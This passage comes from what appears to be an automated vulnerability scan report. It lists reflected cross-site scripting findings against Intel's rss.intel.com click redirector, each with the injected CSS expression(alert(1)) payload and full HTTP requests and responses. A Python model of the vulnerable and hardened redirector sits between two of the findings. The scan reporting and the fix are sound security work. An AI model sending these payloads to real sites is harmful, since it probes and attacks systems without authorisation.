Location: http://newsroom.intel.com/communitya3c60"style="x:expression(alert(1))"f7e517be872/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/communitya3c60"style="x:expression(alert(1))"f7e517be872/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110">
...[SNIP]...

4.21. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 5]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76889"style%3d"x%3aexpression(alert(1))"10790f520d6 was submitted in the REST URL parameter 5. This input was echoed as 76889"style="x:expression(alert(1))"10790f520d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom76889"style%3d"x%3aexpression(alert(1))"10790f520d6/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:16 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom76889"style="x:expression(alert(1))"10790f520d6/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom76889"style="x:expression(alert(1))"10790f520d6/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110">
...[SNIP]...

4.22. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 6]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 836ce"style%3d"x%3aexpression(alert(1))"5c86aca20ef was submitted in the REST URL parameter 6. This input was echoed as 836ce"style="x:expression(alert(1))"5c86aca20ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog836ce"style%3d"x%3aexpression(alert(1))"5c86aca20ef/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:20 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog836ce"style="x:expression(alert(1))"5c86aca20ef/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog836ce"style="x:expression(alert(1))"5c86aca20ef/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110">
...[SNIP]...

4.23. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 7]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0641"style%3d"x%3aexpression(alert(1))"b954a0a85d7 was submitted in the REST URL parameter 7. This input was echoed as a0641"style="x:expression(alert(1))"b954a0a85d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011a0641"style%3d"x%3aexpression(alert(1))"b954a0a85d7/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:25 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011a0641"style="x:expression(alert(1))"b954a0a85d7/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011a0641"style="x:expression(alert(1))"b954a0a85d7/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110">
...[SNIP]...

4.24. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 8]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9097b"style%3d"x%3aexpression(alert(1))"cec4b375443 was submitted in the REST URL parameter 8. This input was echoed as 9097b"style="x:expression(alert(1))"cec4b375443 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/019097b"style%3d"x%3aexpression(alert(1))"cec4b375443/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:29 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/019097b"style="x:expression(alert(1))"cec4b375443/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/019097b"style="x:expression(alert(1))"cec4b375443/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110">
...[SNIP]...

4.25. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 9]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3032"style%3d"x%3aexpression(alert(1))"44ad55bd7e was submitted in the REST URL parameter 9. This input was echoed as d3032"style="x:expression(alert(1))"44ad55bd7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31d3032"style%3d"x%3aexpression(alert(1))"44ad55bd7e/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:34 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31d3032"style="x:expression(alert(1))"44ad55bd7e/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110
Content-Length: 235
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31d3032"style="x:expression(alert(1))"44ad55bd7e/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110">
...[SNIP]...

4.26. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 10]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1f4c"style%3d"x%3aexpression(alert(1))"fade0cdb384 was submitted in the REST URL parameter 10. This input was echoed as b1f4c"style="x:expression(alert(1))"fade0cdb384 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industryb1f4c"style%3d"x%3aexpression(alert(1))"fade0cdb384 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:38 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industryb1f4c"style="x:expression(alert(1))"fade0cdb384?cid=rss-182178-c1-264136
Content-Length: 256
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industryb1f4c"style="x:expression(alert(1))"fade0cdb384?cid=rss-182178-c1-264136">
...[SNIP]...
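The pattern shared by findings 4.26 through 4.39 is a click-tracking redirector that copies one path segment of the request verbatim into both the Location header and a double-quoted href in the response body. The Python model below is an added example written for this report, not Intel's redirector code. It reproduces the unsafe behaviour, places a hardened version beside it (feed-id pattern check, destination-host allow-list, percent-encoding of path and query, HTML attribute escaping of the href), and includes the scanner-style check for an unencoded reflection. The allow-listed host, the feed-id pattern and all function names are assumptions; the canary marker values are constructed.

```python
import html
import re
from urllib.parse import quote, urlsplit, urlunsplit

# Canary in the same shape as the scanner's payload: random prefix, a double
# quote that closes the href attribute, a style attribute carrying an IE-only
# CSS expression(), random suffix. The hex markers are constructed values.
CANARY = 'b1f4c"style="x:expression(alert(1))"fade0cdb384'

# Assumptions for the hardened version: the redirector may only forward to
# these hosts, and feed ids look like ~rss-182178-c1-264136 (minus the '~').
ALLOWED_HOSTS = {"newsroom.intel.com"}
FEED_ID_RE = re.compile(r"[A-Za-z0-9-]+")


def vulnerable_redirect(feed_id, target):
    """Models what the report shows: everything after /click/~<feed>/ is
    copied verbatim into the Location header and into a double-quoted href
    in the text/plain body. Nothing is validated or encoded."""
    location = f"http://{target}?cid={feed_id}"
    body = f'The URL has moved <a href="{location}">'
    headers = {"Location": location,
               "Content-Type": "text/plain; charset=UTF-8"}
    return 302, headers, body


def hardened_redirect(feed_id, target):
    """Same contract, but: the feed id must match a strict pattern, the
    destination host must be allow-listed, path and query are percent-encoded
    (so '"', '<', CR and LF cannot reach the header or the attribute), and
    the href is additionally HTML-attribute-escaped."""
    if not FEED_ID_RE.fullmatch(feed_id):
        raise ValueError("invalid feed id")
    parts = urlsplit("http://" + target)
    if parts.hostname not in ALLOWED_HOSTS:
        raise ValueError("destination host not allowed")
    path = quote(parts.path or "/", safe="/")
    query = "&".join(q for q in (quote(parts.query, safe="=&"),
                                 f"cid={feed_id}") if q)
    location = urlunsplit(("http", parts.hostname, path, query, ""))
    body = f'The URL has moved <a href="{html.escape(location, quote=True)}">'
    headers = {"Location": location,
               "Content-Type": "text/plain; charset=UTF-8"}
    return 302, headers, body


def reflected_unencoded(headers, body, canary=CANARY):
    """The check the scanner performs: is the payload echoed with its quotes
    intact, i.e. able to close the attribute? A raw CR/LF in Location is
    flagged too, since that would be header injection rather than XSS."""
    loc = headers.get("Location", "")
    return canary in body or canary in loc or "\r" in loc or "\n" in loc


def is_rejected(feed_id, target):
    """True when the hardened redirector refuses the input outright."""
    try:
        hardened_redirect(feed_id, target)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    feed = "rss-182178-c1-264136"
    dest = "newsroom.intel.com/community/intel_newsroom" + CANARY
    for fn in (vulnerable_redirect, hardened_redirect):
        status, hdrs, body = fn(feed, dest)
        print(fn.__name__, status, hdrs["Location"])
        print("  reflected unencoded:", reflected_unencoded(hdrs, body))
```

Running the module prints the Location header each variant emits for the same canary: the vulnerable one carries the bare quotes through, the hardened one turns them into %22 so neither the attribute nor the header can be broken out of. Percent-encoding the path segment is what fixes the finding; the host allow-list and feed-id check are the additional controls a redirector of this kind should have anyway, because an open redirector is its own issue.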

4.27. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ebf"style%3d"x%3aexpression(alert(1))"590865e6e81 was submitted in the REST URL parameter 2. This input was echoed as b0ebf"style="x:expression(alert(1))"590865e6e81 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (expression() was dropped from IE8 standards mode and was never supported by other browsers), so it may not work elsewhere.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers follow the Location header and do not process the contents of the response body. Unless you can find a way to prevent the application from performing the redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice; the body is also served as text/plain, so a browser would additionally have to sniff it as HTML. These limitations considerably mitigate the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264136b0ebf"style%3d"x%3aexpression(alert(1))"590865e6e81/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:02 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136b0ebf"style="x:expression(alert(1))"590865e6e81
Content-Length: 256
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136b0ebf"style="x:expression(alert(1))"590865e6e81">
...[SNIP]...

4.28. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 466d2"style%3d"x%3aexpression(alert(1))"1ac3c960942 was submitted in the REST URL parameter 3. This input was echoed as 466d2"style="x:expression(alert(1))"1ac3c960942 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (expression() was dropped from IE8 standards mode and was never supported by other browsers), so it may not work elsewhere.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers follow the Location header and do not process the contents of the response body. Unless you can find a way to prevent the application from performing the redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice; the body is also served as text/plain, so a browser would additionally have to sniff it as HTML. These limitations considerably mitigate the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264136/newsroom.intel.com466d2"style%3d"x%3aexpression(alert(1))"1ac3c960942/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:07 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com466d2"style="x:expression(alert(1))"1ac3c960942/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry
Content-Length: 231
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com466d2"style="x:expression(alert(1))"1ac3c960942/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry">
...[SNIP]...

4.29. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9389"style%3d"x%3aexpression(alert(1))"f5c3f0bb420 was submitted in the REST URL parameter 4. This input was echoed as b9389"style="x:expression(alert(1))"f5c3f0bb420 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (expression() was dropped from IE8 standards mode and was never supported by other browsers), so it may not work elsewhere.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers follow the Location header and do not process the contents of the response body. Unless you can find a way to prevent the application from performing the redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice; the body is also served as text/plain, so a browser would additionally have to sniff it as HTML. These limitations considerably mitigate the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264136/newsroom.intel.com/communityb9389"style%3d"x%3aexpression(alert(1))"f5c3f0bb420/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:12 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/communityb9389"style="x:expression(alert(1))"f5c3f0bb420/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136
Content-Length: 256
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/communityb9389"style="x:expression(alert(1))"f5c3f0bb420/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136">
...[SNIP]...

4.30. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 5]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12e33"style%3d"x%3aexpression(alert(1))"4ade294bbf was submitted in the REST URL parameter 5. This input was echoed as 12e33"style="x:expression(alert(1))"4ade294bbf in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (expression() was dropped from IE8 standards mode and was never supported by other browsers), so it may not work elsewhere.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers follow the Location header and do not process the contents of the response body. Unless you can find a way to prevent the application from performing the redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice; the body is also served as text/plain, so a browser would additionally have to sniff it as HTML. These limitations considerably mitigate the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom12e33"style%3d"x%3aexpression(alert(1))"4ade294bbf/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:16 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom12e33"style="x:expression(alert(1))"4ade294bbf/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136
Content-Length: 255
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom12e33"style="x:expression(alert(1))"4ade294bbf/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136">
...[SNIP]...

4.31. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 6]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f162d"style%3d"x%3aexpression(alert(1))"85b19f3f875 was submitted in the REST URL parameter 6. This input was echoed as f162d"style="x:expression(alert(1))"85b19f3f875 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (expression() was dropped from IE8 standards mode and was never supported by other browsers), so it may not work elsewhere.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers follow the Location header and do not process the contents of the response body. Unless you can find a way to prevent the application from performing the redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice; the body is also served as text/plain, so a browser would additionally have to sniff it as HTML. These limitations considerably mitigate the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blogf162d"style%3d"x%3aexpression(alert(1))"85b19f3f875/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:21 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blogf162d"style="x:expression(alert(1))"85b19f3f875/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136
Content-Length: 256
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blogf162d"style="x:expression(alert(1))"85b19f3f875/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136">
...[SNIP]...

4.32. http://rss.intel.com/click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry [REST URL parameter 7]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81880"style%3d"x%3aexpression(alert(1))"bb824d9c0ed was submitted in the REST URL parameter 7. This input was echoed as 81880"style="x:expression(alert(1))"bb824d9c0ed in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (expression() was dropped from IE8 standards mode and was never supported by other browsers), so it may not work elsewhere.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers follow the Location header and do not process the contents of the response body. Unless you can find a way to prevent the application from performing the redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice; the body is also served as text/plain, so a browser would additionally have to sniff it as HTML. These limitations considerably mitigate the impact of the vulnerability.

Request

